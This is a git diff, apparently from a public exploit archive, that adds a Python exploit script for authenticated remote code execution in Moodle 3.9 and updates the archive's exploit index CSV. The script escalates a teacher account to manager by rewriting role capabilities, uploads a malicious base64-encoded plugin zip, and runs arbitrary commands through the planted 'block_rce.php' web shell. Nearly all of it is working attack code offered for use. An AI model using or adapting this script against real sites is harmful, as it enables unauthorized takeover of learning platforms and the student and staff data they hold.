iewawarded','1'),('moodle/badges:viewbadges','1'),('moodle/calendar:manageentries','1'),('moodle/calendar:managegroupentries','1'),('moodle/calendar:manageownentries','1'),('moodle/cohort:view','1'),('moodle/comment:delete','1'),('moodle/comment:post','1'),('moodle/comment:view','1'),('moodle/competency:competencygrade','1'),('moodle/competency:coursecompetencygradable','1'),('moodle/competency:coursecompetencymanage','1'),('moodle/competency:coursecompetencyview','1'),('moodle/contentbank:access','1'),('moodle/contentbank:deleteanycontent','1'),('moodle/contentbank:deleteowncontent','1'),('moodle/contentbank:manageanycontent','1'),('moodle/contentbank:manageowncontent','1'),('moodle/contentbank:upload','1'),('moodle/contentbank:useeditor','1'),('moodle/course:bulkmessaging','1'),('moodle/course:changecategory','1'),('moodle/course:changefullname','1'),('moodle/course:changeidnumber','1'),('moodle/course:changelockedcustomfields','1'),('moodle/course:changeshortname','1'),('moodle/course:changesummary','1'),('moodle/course:creategroupconversations','1'),('moodle/course:delete','1'),('moodle/course:enrolconfig','1'),('moodle/course:enrolreview','1'),('moodle/course:ignorefilesizelimits','1'),('moodle/course:isincompletionreports','1'),('moodle/course:managefiles','1'),('moodle/course:managegroups','1'),('moodle/course:managescales','1'),('moodle/course:markcomplete','1'),('moodle/course:movesections','1'),('moodle/course:overridecompletion','1'),('moodle/course:renameroles','1'),('moodle/course:reset','1'),('moodle/course:reviewotherusers','1'),('moodle/course:sectionvisibility','1'),('moodle/course:setcurrentsection','1'),('moodle/course:setforcedlanguage','1'),('moodle/course:tag','1'),('moodle/course:update','1'),('moodle/course:useremail','1'),('moodle/course:view','1'),('moodle/course:viewhiddencourses','1'),('moodle/course:viewhiddensections','1'),('moodle/course:viewhiddenuserfields','1'),('moodle/course:viewparticipants','1'),('moodle/course:viewscales','1'),
('moodle/course:viewsuspendedusers','1'),('moodle/course:visibility','1'),('moodle/filter:manage','1'),('moodle/grade:edit','1'),('moodle/grade:export','1'),('moodle/grade:hide','1'),('moodle/grade:import','1'),('moodle/grade:lock','1'),('moodle/grade:manage','1'),('moodle/grade:managegradingforms','1'),('moodle/grade:manageletters','1'),('moodle/grade:manageoutcomes','1'),('moodle/grade:unlock','1'),('moodle/grade:view','1'),('moodle/grade:viewall','1'),('moodle/grade:viewhidden','1'),('moodle/notes:manage','1'),('moodle/notes:view','1'),('moodle/question:add','1'),('moodle/question:editall','1'),('moodle/question:editmine','1'),('moodle/question:flag','1'),('moodle/question:managecategory','1'),('moodle/question:moveall','1'),('moodle/question:movemine','1'),('moodle/question:tagall','1'),('moodle/question:tagmine','1'),('moodle/question:useall','1'),('moodle/question:usemine','1'),('moodle/question:viewall','1'),('moodle/question:viewmine','1'),('moodle/rating:rate','1'),('moodle/rating:view','1'),('moodle/rating:viewall','1'),('moodle/rating:viewany','1'),('moodle/restore:configure','1'),('moodle/restore:restoreactivity','1'),('moodle/restore:restorecourse','1'),('moodle/restore:restoresection','1'),('moodle/restore:restoretargetimport','1'),('moodle/restore:rolldates','1'),('moodle/restore:uploadfile','1'),('moodle/restore:userinfo','1'),('moodle/restore:viewautomatedfilearea','1'),('moodle/role:assign','1'),('moodle/role:override','1'),('moodle/role:review','1'),('moodle/role:safeoverride','1'),('moodle/role:switchroles','1'),('moodle/site:viewreports','1'),('moodle/user:loginas','1'),('moodle/user:viewdetails','1'),('moodle/user:viewhiddendetails','1'),('report/completion:view','1'),('report/log:view','1'),('report/log:viewtoday','1'),('report/loglive:view','1'),('report/outline:view','1'),('report/outline:viewuserreport','1'),('report/participation:view','1'),('report/progress:view','1'),('report/stats:view','1'),('repository/contentbank:accesscoursecontent'
,'1'),('tool/monitor:managerules','1'),('tool/monitor:subscribe','1'),('tool/recyclebin:deleteitems','1'),('tool/recyclebin:restoreitems','1'),('tool/recyclebin:viewitems','1'),('webservice/rest:use','1'),('webservice/soap:use','1'),('webservice/xmlrpc:use','1'),('atto/h5p:addembed','1'),('atto/recordrtc:recordaudio','1'),('atto/recordrtc:recordvideo','1'),('booktool/exportimscp:export','1'),('booktool/importhtml:import','1'),('booktool/print:print','1'),('forumreport/summary:view','1'),('forumreport/summary:viewall','1'),('mod/assign:editothersubmission','1'),('mod/assign:exportownsubmission','1'),('mod/assign:grade','1'),('mod/assign:grantextension','1'),('mod/assign:manageallocations','1'),('mod/assign:managegrades','1'),('mod/assign:manageoverrides','1'),('mod/assign:receivegradernotifications','1'),('mod/assign:releasegrades','1'),('mod/assign:revealidentities','1'),('mod/assign:reviewgrades','1'),('mod/assign:showhiddengrader','1'),('mod/assign:submit','1'),('mod/assign:view','1'),('mod/assign:viewblinddetails','1'),('mod/assign:viewgrades','1'),('mod/assignment:exportownsubmission','1'),('mod/assignment:grade','1'),('mod/assignment:submit','1'),('mod/assignment:view','1'),('mod/book:edit','1'),('mod/book:read','1'),('mod/book:viewhiddenchapters','1'),('mod/chat:chat','1'),('mod/chat:deletelog','1'),('mod/chat:exportparticipatedsession','1'),('mod/chat:exportsession','1'),('mod/chat:readlog','1'),('mod/chat:view','1'),('mod/choice:choose','1'),('mod/choice:deleteresponses','1'),('mod/choice:downloadresponses','1'),('mod/choice:readresponses','1'),('mod/choice:view','1'),('mod/data:approve','1'),('mod/data:comment','1'),('mod/data:exportallentries','1'),('mod/data:exportentry','1'),('mod/data:exportownentry','1'),('mod/data:exportuserinfo','1'),('mod/data:managecomments','1'),('mod/data:manageentries','1'),('mod/data:managetemplates','1'),('mod/data:manageuserpresets','1'),('mod/data:rate','1'),('mod/data:view','1'),('mod/data:viewallratings','1'),('mod/data:vi
ewalluserpresets','1'),('mod/data:viewanyrating','1'),('mod/data:viewentry','1'),('mod/data:viewrating','1'),('mod/data:writeentry','1'),('mod/feedback:complete','1'),('mod/feedback:createprivatetemplate','1'),('mod/feedback:createpublictemplate','1'),('mod/feedback:deletesubmissions','1'),('mod/feedback:deletetemplate','1'),('mod/feedback:edititems','1'),('mod/feedback:mapcourse','1'),('mod/feedback:receivemail','1'),('mod/feedback:view','1'),('mod/feedback:viewanalysepage','1'),('mod/feedback:viewreports','1'),('mod/folder:managefiles','1'),('mod/folder:view','1'),('mod/forum:addnews','1'),('mod/forum:addquestion','1'),('mod/forum:allowforcesubscribe','1'),('mod/forum:canoverridecutoff','1'),('mod/forum:canoverridediscussionlock','1'),('mod/forum:canposttomygroups','1'),('mod/forum:cantogglefavourite','1'),('mod/forum:createattachment','1'),('mod/forum:deleteanypost','1'),('mod/forum:deleteownpost','1'),('mod/forum:editanypost','1'),('mod/forum:exportdiscussion','1'),('mod/forum:exportforum','1'),('mod/forum:exportownpost','1'),('mod/forum:exportpost','1'),('mod/forum:grade','1'),('mod/forum:managesubscriptions','1'),('mod/forum:movediscussions','1'),('mod/forum:pindiscussions','1'),('mod/forum:postprivatereply','1'),('mod/forum:postwithoutthrottling','1'),('mod/forum:rate','1'),('mod/forum:readprivatereplies','1'),('mod/forum:replynews','1'),('mod/forum:replypost','1'),('mod/forum:splitdiscussions','1'),('mod/forum:startdiscussion','1'),('mod/forum:viewallratings','1'),('mod/forum:viewanyrating','1'),('mod/forum:viewdiscussion','1'),('mod/forum:viewhiddentimedposts','1'),('mod/forum:viewqandawithoutposting','1'),('mod/forum:viewrating','1'),('mod/forum:viewsubscribers','1'),('mod/glossary:approve','1'),('mod/glossary:comment','1'),('mod/glossary:export','1'),('mod/glossary:exportentry','1'),('mod/glossary:exportownentry','1'),('mod/glossary:import','1'),('mod/glossary:managecategories','1'),('mod/glossary:managecomments','1'),('mod/glossary:manageentries','1'),('
mod/glossary:rate','1'),('mod/glossary:view','1'),('mod/glossary:viewallratings','1'),('mod/glossary:viewanyrating','1'),('mod/glossary:viewrating','1'),('mod/glossary:write','1'),('mod/h5pactivity:reviewattempts','1'),('mod/h5pactivity:submit','1'),('mod/h5pactivity:view','1'),('mod/imscp:view','1'),('mod/label:view','1'),('mod/lesson:edit','1'),('mod/lesson:grade','1'),('mod/lesson:manage','1'),('mod/lesson:manageoverrides','1'),('mod/lesson:view','1'),('mod/lesson:viewreports','1'),('mod/lti:admin','1'),('mod/lti:manage','1'),('mod/lti:view','1'),('mod/page:view','1'),('mod/quiz:attempt','1'),('mod/quiz:deleteattempts','1'),('mod/quiz:emailconfirmsubmission','1'),('mod/quiz:emailnotifysubmission','1'),('mod/quiz:emailwarnoverdue','1'),('mod/quiz:grade','1'),('mod/quiz:ignoretimelimits','1'),('mod/quiz:manage','1'),('mod/quiz:manageoverrides','1'),('mod/quiz:preview','1'),('mod/quiz:regrade','1'),('mod/quiz:reviewmyattempts','1'),('mod/quiz:view','1'),('mod/quiz:viewreports','1'),('mod/resource:view','1'),('mod/scorm:deleteownresponses','1'),('mod/scorm:deleteresponses','1'),('mod/scorm:savetrack','1'),('mod/scorm:skipview','1'),('mod/scorm:viewreport','1'),('mod/scorm:viewscores','1'),('mod/survey:download','1'),('mod/survey:participate','1'),('mod/survey:readresponses','1'),('mod/url:view','1'),('mod/wiki:createpage','1'),('mod/wiki:editcomment','1'),('mod/wiki:editpage','1'),('mod/wiki:managecomment','1'),('mod/wiki:managefiles','1'),('mod/wiki:managewiki','1'),('mod/wiki:overridelock','1'),('mod/wiki:viewcomment','1'),('mod/wiki:viewpage','1'),('mod/workshop:allocate','1'),('mod/workshop:deletesubmissions','1'),('mod/workshop:editdimensions','1'),('mod/workshop:exportsubmissions','1'),('mod/workshop:ignoredeadlines','1'),('mod/workshop:manageexamples','1'),('mod/workshop:overridegrades','1'),('mod/workshop:peerassess','1'),('mod/workshop:publishsubmissions','1'),('mod/workshop:submit','1'),('mod/workshop:switchphase','1'),('mod/workshop:view','1'),('mod/worksh
op:viewallassessments','1'),('mod/workshop:viewallsubmissions','1'),('mod/workshop:viewauthornames','1'),('mod/workshop:viewauthorpublished','1'),('mod/workshop:viewpublishedsubmissions','1'),('mod/workshop:viewreviewernames','1'),('moodle/backup:backupactivity','1'),('moodle/competency:coursecompetencyconfigure','1'),('moodle/course:activityvisibility','1'),('moodle/course:ignoreavailabilityrestrictions','1'),('moodle/course:manageactivities','1'),('moodle/course:togglecompletion','1'),('moodle/course:viewhiddenactivities','1'),('moodle/h5p:deploy','1'),('moodle/h5p:setdisplayoptions','1'),('moodle/h5p:updatelibraries','1'),('moodle/site:accessallgroups','1'),('moodle/site:managecontextlocks','1'),('moodle/site:trustcontent','1'),('moodle/site:viewanonymousevents','1'),('moodle/site:viewfullnames','1'),('moodle/site:viewuseridentity','1'),('quiz/grading:viewidnumber','1'),('quiz/grading:viewstudentnames','1'),('quiz/statistics:view','1'),('quizaccess/seb:bypassseb','1'),('quizaccess/seb:manage_filemanager_sebconfigfile','1'),('quizaccess/seb:manage_seb_activateurlfiltering','1'),('quizaccess/seb:manage_seb_allowedbrowserexamkeys','1'),('quizaccess/seb:manage_seb_allowreloadinexam','1'),('quizaccess/seb:manage_seb_allowspellchecking','1'),('quizaccess/seb:manage_seb_allowuserquitseb','1'),('quizaccess/seb:manage_seb_enableaudiocontrol','1'),('quizaccess/seb:manage_seb_expressionsallowed','1'),('quizaccess/seb:manage_seb_expressionsblocked','1'),('quizaccess/seb:manage_seb_filterembeddedcontent','1'),('quizaccess/seb:manage_seb_linkquitseb','1'),('quizaccess/seb:manage_seb_muteonstartup','1'),('quizaccess/seb:manage_seb_quitpassword','1'),('quizaccess/seb:manage_seb_regexallowed','1'),('quizaccess/seb:manage_seb_regexblocked','1'),('quizaccess/seb:manage_seb_requiresafeexambrowser','1'),('quizaccess/seb:manage_seb_showkeyboardlayout','1'),('quizaccess/seb:manage_seb_showreloadbutton','1'),('quizaccess/seb:manage_seb_showsebdownloadlink','1'),('quizaccess/seb:manage_s
eb_showsebtaskbar','1'),('quizaccess/seb:manage_seb_showtime','1'),('quizaccess/seb:manage_seb_showwificontrol','1'),('quizaccess/seb:manage_seb_templateid','1'),('quizaccess/seb:manage_seb_userconfirmquit','1'),('repository/areafiles:view','1'),('repository/boxnet:view','1'),('repository/contentbank:view','1'),('repository/coursefiles:view','1'),('repository/dropbox:view','1'),('repository/equella:view','1'),('repository/filesystem:view','1'),('repository/flickr:view','1'),('repository/flickr_public:view','1'),('repository/googledocs:view','1'),('repository/local:view','1'),('repository/merlot:view','0'),('repository/nextcloud:view','1'),('repository/onedrive:view','1'),('repository/picasa:view','1'),('repository/recent:view','1'),('repository/s3:view','1'),('repository/skydrive:view','1'),('repository/upload:view','1'),('repository/url:view','1'),('repository/user:view','1'),('repository/webdav:view','1'),('repository/wikimedia:view','1'),('repository/youtube:view','1'),('block/activity_modules:addinstance','1'),('block/activity_results:addinstance','1'),('block/admin_bookmarks:addinstance','1'),('block/badges:addinstance','1'),('block/blog_menu:addinstance','1'),('block/blog_recent:addinstance','1'),('block/blog_tags:addinstance','1'),('block/calendar_month:addinstance','1'),('block/calendar_upcoming:addinstance','1'),('block/comments:addinstance','1'),('block/completionstatus:addinstance','1'),('block/course_list:addinstance','1'),('block/course_summary:addinstance','1'),('block/feedback:addinstance','1'),('block/globalsearch:addinstance','1'),('block/glossary_random:addinstance','1'),('block/html:addinstance','1'),('block/login:addinstance','1'),('block/mentees:addinstance','1'),('block/mnet_hosts:addinstance','1'),('block/myprofile:addinstance','1'),('block/navigation:addinstance','1'),('block/news_items:addinstance','1'),('block/online_users:addinstance','1'),('block/online_users:viewlist','1'),('block/private_files:addinstance','1'),('block/quiz_results:addi
nstance','1'),('block/recent_activity:addinstance','1'),('block/rss_client:addinstance','1'),('block/rss_client:manageanyfeeds','1'),('block/rss_client:manageownfeeds','1'),('block/search_forums:addinstance','1'),('block/section_links:addinstance','1'),('block/selfcompletion:addinstance','1'),('block/settings:addinstance','1'),('block/site_main_menu:addinstance','1'),('block/social_activities:addinstance','1'),('block/tag_flickr:addinstance','1'),('block/tag_youtube:addinstance','1'),('block/tags:addinstance','1'),('moodle/block:edit','1'),('moodle/block:view','1'),('moodle/site:manageblocks','1'),('savechanges','Save changes')] + + r = session.post(url + '/admin/roles/define.php', params=data_get, data=data_post) + + # Above we modify description field, so, if script find that description on site, we are good. + if random_desc not in r.text: + p6.failure(Color.RED + "✘" + Color.END) + print(Color.RED + "\nTrouble updating fields\n") + exit(1) + else: + r = session.get(url + '/admin/search.php') + if "Install plugins" not in r.text: + p6.failure(Color.RED + "✘" + Color.END) + print(Color.RED + "\nModified fields but the options to install plugins have not been enabled.") + print(Color.RED + "- (This is weird, sometimes he does it, sometimes he doesn't!!) 
Try again.\n")
+ exit(1)
+
+ sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]
+
+ p6.success(Color.YELLOW + "✓" + Color.END)
+ time.sleep(1)
+
+ return session, sess_key
+
+def zipb64_up(session, url, sess_key, teacher_user, course_id):
+ '''
+ Doing upload of zip file as base64 binary data
+ * https://stackabuse.com/encoding-and-decoding-base64-strings-in-python/
+ '''
+
+ p7 = log.progress("Uploading malicious " + Color.BLUE + ".zip" + Color.END + " file")
+
+ r = session.get(url + '/admin/tool/installaddon/index.php')
+ zipfile_id = re.findall(r'name="zipfile" id="id_zipfile" value="(.*?)"', r.text)[0]
+ client_id = re.findall(r'"client_id":"(.*?)"', r.text)[0]
+
+ # Upupup
+ data_get = {"action":"upload"}
+ data_post = {
+ "title" : "",
+ "author" : teacher_user,
+ "license" : "unknown",
+ "itemid" : [zipfile_id, zipfile_id],
+ "accepted_types[]" : [".zip",".zip"],
+ "repo_id" : course_id,
+ "p" : "",
+ "page" : "",
+ "env" : "filepicker",
+ "sesskey" : sess_key,
+ "client_id" : client_id,
+ "maxbytes" : "-1",
+ "areamaxbytes" : "-1",
+ "ctx_id" : "1",
+ "savepath" : "/"
+ }
+
+ zip_b64 = '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'
+ zip_file_bytes = zip_b64.encode('utf-8')
+ zip_file_b64 = base64.decodebytes(zip_file_bytes)
+
+ data_file = [
+ ('repo_upload_file',
+ ('rce.zip', zip_file_b64, 'application/zip'))]
+
+ r = session.post(url + '/repository/repository_ajax.php', params=data_get, data=data_post, files=data_file)
+ if "rce.zip" not in r.text:
+ p7.failure(Color.RED + "✘" + Color.END)
+ print(Color.RED + "\nError uploading zip file.\n")
+ exit(1)
+
+ # Trying to load file
+ data_post = {
+ "sesskey" : sess_key,
+ "_qf__tool_installaddon_installfromzip_form" : "1",
+ "mform_showmore_id_general" : "0",
+ "mform_isexpanded_id_general" : "1",
+ "zipfile" : zipfile_id,
+ "plugintype" : "",
+ "rootdir" : "",
+ "submitbutton" : "Install plugin from the ZIP file"
+ }
+
+ r = session.post(url + '/admin/tool/installaddon/index.php', data=data_post)
+ if "Validation successful, installation can continue" not in r.text:
+ p7.failure(Color.RED + "✘" + Color.END)
+ print(Color.RED + "\nError uploading zip file, problems on plugin install.\n")
+ exit(1)
+
+ # Confirm load
+ zip_storage = re.findall(r'installzipstorage=(.*?)&', r.url)[0]
+ data_post = {
+ "installzipcomponent" : "block_rce",
+ "installzipstorage" : zip_storage,
+ "installzipconfirm" : "1",
+ "sesskey" : sess_key
+ }
+
+ r = session.post(url + '/admin/tool/installaddon/index.php', data=data_post)
+ if "Current release information" not in r.text:
+ p7.failure(Color.RED + "✘" + Color.END)
+ print(Color.RED + "\nError uploading zip file, confirmation problems.\n")
+ exit(1)
+
+ p7.success(Color.YELLOW + "✓" + Color.END)
+ time.sleep(1)
+
+ return session
+
+def moodle_RCE(url, command):
+ '''
+ Remote Command Execution on system with plugin installed (malicious zip file)
+ '''
+
+ p8 = log.progress("Executing " + Color.BLUE + command + Color.END)
+ time.sleep(1)
+
+ data_get = {"cmd" : command}
+
+ try:
+ r = session.get(url + '/blocks/rce/lang/en/block_rce.php', params=data_get, timeout=3)
+ p8.success(Color.YELLOW + "✓" + Color.END)
+ time.sleep(1)
+ print("\n" + Color.YELLOW + r.text + Color.END)
+ except requests.exceptions.Timeout as e:
+ p8.success(Color.YELLOW + "✓" + Color.END)
+ time.sleep(1)
+ pass
+
+ print("[" + Color.YELLOW + "+" + Color.END + "]" + Color.GREEN + " Keep breaking ev3rYthiNg!!\n" + Color.END)
+
+if __name__ == '__main__':
+ args = arguments()
+ session, id_user, sess_key = login(args.url, args.username, args.password, args.id_course, args.teacher_cookie)
+ enrol2rce(session, args.url, args.id_manager, args.username, args.id_course, args.teacher_cookie, args.command)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index af83c88d3..bae62769b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -43795,7 +43795,7 @@ id,file,description,date,author,type,platform,port
 49392,exploits/php/webapps/49392.txt,"ECSIMAGING PACS 6.21.5 - SQL injection",2021-01-07,shoxxdj,webapps,php,
 49393,exploits/php/webapps/49393.txt,"CRUD Operation 1.0 - Multiple Stored XSS",2021-01-07,"Arnav Tripathy",webapps,php,
 49395,exploits/php/webapps/49395.txt,"Life Insurance Management System 1.0 - Multiple Stored XSS",2021-01-08,"Arnav Tripathy",webapps,php,
-49396,exploits/php/webapps/49396.txt,"Online Doctor Appointment System 1.0 - Multiple Stored XSS",2021-01-08,"Mohamed habib Smidi",webapps,php,
+49396,exploits/php/webapps/49396.txt,"Online Doctor Appointment System 1.0 - 'Multiple' Stored XSS",2021-01-08,"Mohamed habib Smidi",webapps,php,
 49397,exploits/multiple/webapps/49397.txt,"Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)",2021-01-08,"Metin Yunus Kandemir",webapps,multiple,
 49398,exploits/java/webapps/49398.rb,"Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)",2021-01-08,"SunCSR Team",webapps,java,
 49399,exploits/php/webapps/49399.rb,"WordPress Plugin Autoptimize 2.7.6 - Authenticated Arbitrary File Upload (Metasploit)",2021-01-08,"SunCSR Team",webapps,php,
@@ -44309,3 +44309,6 @@ id,file,description,date,author,type,platform,port
 50176,exploits/php/webapps/50176.txt,"qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)",2021-08-04,"Leon Trappett",webapps,php,
 50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",2021-08-04,"Mohammad Koochaki",webapps,php,
 50178,exploits/java/webapps/50178.sh,"ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments",2021-08-04,"Adrián Díaz",webapps,java,
+50179,exploits/php/webapps/50179.txt,"CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated)",2021-08-05,splint3rsec,webapps,php,
+50180,exploits/php/webapps/50180.py,"Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)",2021-08-05,lanz,webapps,php,
+50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,